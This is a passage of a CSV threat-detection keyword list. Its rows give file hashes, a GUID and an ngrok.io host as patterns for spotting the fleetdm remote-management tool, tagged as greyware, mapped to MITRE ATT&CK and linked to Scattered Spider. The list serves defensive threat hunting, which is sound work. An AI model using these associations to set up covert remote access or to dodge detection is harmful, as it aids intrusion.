TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*321f8b3fa818470657f9bf25d73016bf13ca8833c32f3c2fd98e54f4ef5d00d2*",".{0,1000}321f8b3fa818470657f9bf25d73016bf13ca8833c32f3c2fd98e54f4ef5d00d2.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*3277b33dfc78aeaf0a039394592d87ecbdd8a1964a0cca388df58a5684f796c1*",".{0,1000}3277b33dfc78aeaf0a039394592d87ecbdd8a1964a0cca388df58a5684f796c1.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*33afcd4459db6fdcd977d24963acff551615be452d0fe8e1df8f862f058d6c48*",".{0,1000}33afcd4459db6fdcd977d24963acff551615be452d0fe8e1df8f862f058d6c48.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*3538bb3c8d8d8640f15a31a53e7d688fec5043a5d9ee8ac917da83e699e503e2*",".{0,1000}3538bb3c8d8d8640f15a31a53e7d688fec5043a5d9ee8ac917da83e699e503e2.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*376c1371b87dd3ea20ad65ada4ef47f811218382422843a4ecb3fd590fc62c8a*",".{0,1000}376c1371b87dd3ea20ad65ada4ef47f811218382422843a4ecb3fd590fc62c8a.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*388d03b5f42d14e0d68541fa74da9abc891e3fb7f7f6daae98d8e0e963c255b4*",".{0,1000}388d03b5f42d14e0d68541fa74da9abc891e3fb7f7f6daae98d8e0e963c255b4.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*39e4be4d1d4bb0a5c9bdffd4128901444e603f9c77f5525c87a381131d82f323*",".{0,1000}39e4be4d1d4bb0a5c9bdffd4128901444e603f9c77f5525c87a381131d82f323.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*3a137179e0095bf147e50fea7bec3ffb989f0b53d0bbe5bdab21dba5c173b414*",".{0,1000}3a137179e0095bf147e50fea7bec3ffb989f0b53d0bbe5bdab21dba5c173b414.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*3ba1b87c659e4c9ca752c50c7e9414ed46f982ce88d668e7d918a95af13315c9*",".{0,1000}3ba1b87c659e4c9ca752c50c7e9414ed46f982ce88d668e7d918a95af13315c9.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*3bad0a20a77b7839ab4e236d31b4de469a0e0e58ce2195d2d7b2df8decec7ce3*",".{0,1000}3bad0a20a77b7839ab4e236d31b4de469a0e0e58ce2195d2d7b2df8decec7ce3.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*3e754f15b17e2c21e6579a263990aecdf7652c7994b117d928782cd31cca590a*",".{0,1000}3e754f15b17e2c21e6579a263990aecdf7652c7994b117d928782cd31cca590a.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*3e81cd5540da875704d3109537203c7381b80b854851fe43ff2c806778b061b0*",".{0,1000}3e81cd5540da875704d3109537203c7381b80b854851fe43ff2c806778b061b0.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*3f3ab39136e22d9cf714ab609d182d079a5cf2c6acf36d26ec9d88b64b209509*",".{0,1000}3f3ab39136e22d9cf714ab609d182d079a5cf2c6acf36d26ec9d88b64b209509.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*3fb343762a0cdfe57ac0e85f3b5cb93dc5579c9d820d4a268ca81e809bea089c*",".{0,1000}3fb343762a0cdfe57ac0e85f3b5cb93dc5579c9d820d4a268ca81e809bea089c.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*3ff86dceb685d7dc4b7c14553cc557a3a9eac36e0f0565d8a4c0576f6eee242c*",".{0,1000}3ff86dceb685d7dc4b7c14553cc557a3a9eac36e0f0565d8a4c0576f6eee242c.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*40c8f1e14c24fe384c4ed1845716ea52b391c9a867838f0a817e60d9eff6f941*",".{0,1000}40c8f1e14c24fe384c4ed1845716ea52b391c9a867838f0a817e60d9eff6f941.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*43e4ddd1285dfb190c49ab4c6d488369b5ae72234a5d87afd93bc6fc2d675076*",".{0,1000}43e4ddd1285dfb190c49ab4c6d488369b5ae72234a5d87afd93bc6fc2d675076.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*4445ad2ca90c814faa03bcbd25681af7063bb0d3f6ae4930e433e9d4b6ae84e3*",".{0,1000}4445ad2ca90c814faa03bcbd25681af7063bb0d3f6ae4930e433e9d4b6ae84e3.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*4511497ad6ecfef8d3a9fcf7585eb454edf22ea0dae6f77be2c81e7a6539dcd7*",".{0,1000}4511497ad6ecfef8d3a9fcf7585eb454edf22ea0dae6f77be2c81e7a6539dcd7.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*4524035a526a4871f7165635991d84d188b944dcd74971d3db44335d1e7565fd*",".{0,1000}4524035a526a4871f7165635991d84d188b944dcd74971d3db44335d1e7565fd.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*452ef95ff3475ce13c5533a13d6f3e084ec940091c710a75a335d2cdf47ce846*",".{0,1000}452ef95ff3475ce13c5533a13d6f3e084ec940091c710a75a335d2cdf47ce846.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*4625292d15399581f185b11ab34ba654c5b10f25bfe917132f7e1dcd19dddc94*",".{0,1000}4625292d15399581f185b11ab34ba654c5b10f25bfe917132f7e1dcd19dddc94.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*4655c54ddae45ebc1b2b32a9568af775791964cf9ed6e2198a5d11ce466c23fd*",".{0,1000}4655c54ddae45ebc1b2b32a9568af775791964cf9ed6e2198a5d11ce466c23fd.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*47076023e33117b13ed9e9ef7be415067600c180b460a1c73823560de005eb0d*",".{0,1000}47076023e33117b13ed9e9ef7be415067600c180b460a1c73823560de005eb0d.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*4773c4275d0b56d5b80953003dc9956a6a7aa8c4a016480986fb409aef9b161c*",".{0,1000}4773c4275d0b56d5b80953003dc9956a6a7aa8c4a016480986fb409aef9b161c.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*4a45903123dc54041be3142c9736129aad4a5a440d1f0388e0b8875808cc3d56*",".{0,1000}4a45903123dc54041be3142c9736129aad4a5a440d1f0388e0b8875808cc3d56.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*4a5635751d0b33ed9473bee0c056269d17d33aa3c4a5019d9bb5947a61cb081a*",".{0,1000}4a5635751d0b33ed9473bee0c056269d17d33aa3c4a5019d9bb5947a61cb081a.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*4bf552065bb179e2da10c1e65463ccc68f451faae21468ebc91ec83308ebbe36*",".{0,1000}4bf552065bb179e2da10c1e65463ccc68f451faae21468ebc91ec83308ebbe36.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*4d95694b73357e0e304b68cdbb00bd65da3ffcaa7e2148141dbc4e29357b5a52*",".{0,1000}4d95694b73357e0e304b68cdbb00bd65da3ffcaa7e2148141dbc4e29357b5a52.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*4daa7e8e607567451a1db6eb4c297c60a028263756b460c75bc5a31c39bc968b*",".{0,1000}4daa7e8e607567451a1db6eb4c297c60a028263756b460c75bc5a31c39bc968b.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*4de5606b62d1fe9200c6a473f4d04ebe7a492172e36e8387ec9647c3d399cfd9*",".{0,1000}4de5606b62d1fe9200c6a473f4d04ebe7a492172e36e8387ec9647c3d399cfd9.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*4e021eda86591c657ec781b77472518ecbf51b4f2a1b63e2ab53ac7289e59428*",".{0,1000}4e021eda86591c657ec781b77472518ecbf51b4f2a1b63e2ab53ac7289e59428.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*4e5d34573206efd1a545796a8c2c233a80fe5301c11eee3024e978b0977a4521*",".{0,1000}4e5d34573206efd1a545796a8c2c233a80fe5301c11eee3024e978b0977a4521.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*4eb752de605ffcacb6aaf1e613bef1596b6a4583811d1b2fc6b0948df4febddd*",".{0,1000}4eb752de605ffcacb6aaf1e613bef1596b6a4583811d1b2fc6b0948df4febddd.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*4f4a7ad2eedc23ab3b6127a704fe66efbbda6bc654b98741aa2aadb8293d5864*",".{0,1000}4f4a7ad2eedc23ab3b6127a704fe66efbbda6bc654b98741aa2aadb8293d5864.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*4F748D41-5BE1-4626-A0AB-9EA15CDC2074*",".{0,1000}4F748D41\-5BE1\-4626\-A0AB\-9EA15CDC2074.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered 
Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#GUIDproject","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*4fd9e503868b34bf6c0de86423afd252160aec8f3218458f2a4d3d774b84a99d*",".{0,1000}4fd9e503868b34bf6c0de86423afd252160aec8f3218458f2a4d3d774b84a99d.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*52e9a87377d0237b7c1a1c8247898ec1a41bfa2a52af411694ff62b70b64917b*",".{0,1000}52e9a87377d0237b7c1a1c8247898ec1a41bfa2a52af411694ff62b70b64917b.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*532f05083cc5b4ef33e473ca5d956da9d9e372673bd3803d20193b879a083487*",".{0,1000}532f05083cc5b4ef33e473ca5d956da9d9e372673bd3803d20193b879a083487.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*54d84eaf8b6d8d6d0b865c39b39a8253c079d571e066d02b50c5d0dd50d1be74*",".{0,1000}54d84eaf8b6d8d6d0b865c39b39a8253c079d571e066d02b50c5d0dd50d1be74.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*54ef26ef5847752d4acc732de7e294cb02766d89fc5eb30ead4de42cea331d79*",".{0,1000}54ef26ef5847752d4acc732de7e294cb02766d89fc5eb30ead4de42cea331d79.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*568be7e64dc6dd20516910fe1cd2db611fee2b3051b2ff81ca1ef092bf3bbd91*",".{0,1000}568be7e64dc6dd20516910fe1cd2db611fee2b3051b2ff81ca1ef092bf3bbd91.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*56f939d7b5513df64ad63f7bf2da6cafa98778872aecfbce5f55161648ca4231*",".{0,1000}56f939d7b5513df64ad63f7bf2da6cafa98778872aecfbce5f55161648ca4231.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*59d935b141966f1706eaf690c8937ef1f4a75303b2852f3fcbd6b77d1287d744*",".{0,1000}59d935b141966f1706eaf690c8937ef1f4a75303b2852f3fcbd6b77d1287d744.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*5a65d7c3fda43337fd1422f92403901a460c12a37f89da6cb70833802a2f1c9b*",".{0,1000}5a65d7c3fda43337fd1422f92403901a460c12a37f89da6cb70833802a2f1c9b.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*5b0b491a401d5031b75aaa1bfe8ab32d55befb03d7cb627de72409fce0b5a103*",".{0,1000}5b0b491a401d5031b75aaa1bfe8ab32d55befb03d7cb627de72409fce0b5a103.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*5dc1924bef12ac4d6b3a428b16f92545e54a4f2a53ccf416f327cab35eed20b5*",".{0,1000}5dc1924bef12ac4d6b3a428b16f92545e54a4f2a53ccf416f327cab35eed20b5.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*5e7401fba3d86958c0efddc44addbba7dd34e629ba47501445f1bb9db88eb52a*",".{0,1000}5e7401fba3d86958c0efddc44addbba7dd34e629ba47501445f1bb9db88eb52a.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*625ae9460120.ngrok.io*",".{0,1000}625ae9460120\.ngrok\.io.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","1","N/A","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*635c9083e14310cee41e7f5caaa91249130280aca25911346a82e5edbbbeebf9*",".{0,1000}635c9083e14310cee41e7f5caaa91249130280aca25911346a82e5edbbbeebf9.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*639d2a5d5cab0b60d2f2d22c835f997db1b16cf5ac4a8d88f3c91d43247d359d*",".{0,1000}639d2a5d5cab0b60d2f2d22c835f997db1b16cf5ac4a8d88f3c91d43247d359d.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*65f081caa613ba53342c9c3dd7188f22552b83c9e8ac73f740321f99f6a9fe5b*",".{0,1000}65f081caa613ba53342c9c3dd7188f22552b83c9e8ac73f740321f99f6a9fe5b.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*69ea24257c033294c33d7bb036d7ea550a75d00c2313c6d4ef25126b67d7a574*",".{0,1000}69ea24257c033294c33d7bb036d7ea550a75d00c2313c6d4ef25126b67d7a574.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*69fd60793b4333e2c0fd80f36d293b6eea6cd3b8f3761b65b7074ef1d812fab9*",".{0,1000}69fd60793b4333e2c0fd80f36d293b6eea6cd3b8f3761b65b7074ef1d812fab9.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*6b5f393778459329dbdc69151a3492bb3f18b798bc6e9a7707219923b2a0aab9*",".{0,1000}6b5f393778459329dbdc69151a3492bb3f18b798bc6e9a7707219923b2a0aab9.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*6d331a0cf4808cc0a5141960acfe009d99e5b6e33b477216c9e888d55a04885e*",".{0,1000}6d331a0cf4808cc0a5141960acfe009d99e5b6e33b477216c9e888d55a04885e.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*6de3528cac2c68c0f14a98474db820bb8291b49ab63727e52d58d29288af3fa7*",".{0,1000}6de3528cac2c68c0f14a98474db820bb8291b49ab63727e52d58d29288af3fa7.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*6e12d0f2f68b89133032436717f20a60bc8b9b0e116f2985e658dfb0f1e46066*",".{0,1000}6e12d0f2f68b89133032436717f20a60bc8b9b0e116f2985e658dfb0f1e46066.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 
"*6ebf021ec1ecf18a97b59fcf9c045aa245120b84a84a5319dbbc5ff4c34f42ee*",".{0,1000}6ebf021ec1ecf18a97b59fcf9c045aa245120b84a84a5319dbbc5ff4c34f42ee.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*70f7f49337d31968d4a2b7eb27200bced44eade5ba5c75547bd1f9a51660f2d5*",".{0,1000}70f7f49337d31968d4a2b7eb27200bced44eade5ba5c75547bd1f9a51660f2d5.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" "*710c8601b26a63482c9d8044bfb12d8dec9297aaa593942cb68185276dd304b6*",".{0,1000}710c8601b26a63482c9d8044bfb12d8dec9297aaa593942cb68185276dd304b6.{0,1000}","greyware_tool_keyword","fleetdm","Manage everything in one place","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://github.com/fleetdm/fleet","1","0","#filehash","N/A","10","10","2909","405","2024-08-30T13:04:12Z","2020-11-03T22:17:18Z" 